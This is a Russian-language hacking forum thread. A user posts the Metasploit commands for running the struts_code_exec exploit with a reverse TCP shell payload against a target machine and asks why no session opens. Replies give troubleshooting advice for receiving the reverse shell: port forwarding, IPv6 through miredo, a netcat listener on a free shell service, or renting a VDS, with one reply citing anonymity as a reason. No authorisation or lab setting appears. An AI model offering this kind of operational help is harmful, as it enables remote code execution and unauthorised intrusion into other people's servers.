пытаюсь заюзать один сплойт, подскажите что я не так делаю. начну по порядку: set RHOST 127.0.0.1 (здесь ip нужной машины) set URI /web/user/loginOut.action set RPORT 80 set TARGET 1 use exploit/multi/http/struts_code_exec set PAYLOAD linux/x86/shell/reverse_tcp set LHOST 10.0.2.15 set LPORT 444 msf exploit(struts_code_exec) > exploit [*] Started reverse TCP handler on 10.0.2.15:444 [*] Exploit completed, but no session was created. kali на виртуалке. на физической тачке модем. может что не так с LHOST!? root@john321:~# ip address 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 08:00:27:95:4c:9c brd ff:ff:ff:ff:ff:ff inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic eth0 valid_lft 68663sec preferred_lft 68663sec inet6 fe80::a00:27ff:fe95:4c9c/64 scope link valid_lft forever preferred_lft forever
Нужно чтобы LHOST был доступен для атакуемой машины, чтобы пэйлоад подключится смог. Нужно проброс портов делать с маршрутизатора, чтобы виртуалка кали в случае успеха могла принять входящее соединение.
извиняюсь за нубские вопросы, но как это сделать в моем случае. к физическому компу подключен модем yota. внутренний на компе 10.0.0.5 к примеру. внешний у модема понятное дело другой. в Kali как уже говорил 10.0.2.15.
точнее тут ситуация еще хуже. есть внешний белый ип, затем у моего модема серый - внутренняя сеть yota - и затем уже мой комп. безвыходная ситуация?!
Тебе надо зайти на роутер, найти где-то там "перенаправление", выбрать с какого порта перенаправлять на какой внутренний адрес и порт. Смотри как у меня или может попробовать ipv6. На кали поставь miredo и запусти демона.
Нет, сказать что безвыходная нельзя. Тут можно либо зарегать шелл на unixssh.com, например и повесить там неткат. Только тогда соответствующий пейлоад нужно выбрать (не метерпретер) а обычный бек-коннект, допустим.
Нужен адресс(IP) доступный из вне. Открывать порты на роутере не самое удачное решение (анонимность итд) проще снять vds/vds, благо весьма демократичные цены на рынке, установить метасплоит и не иметь проблем.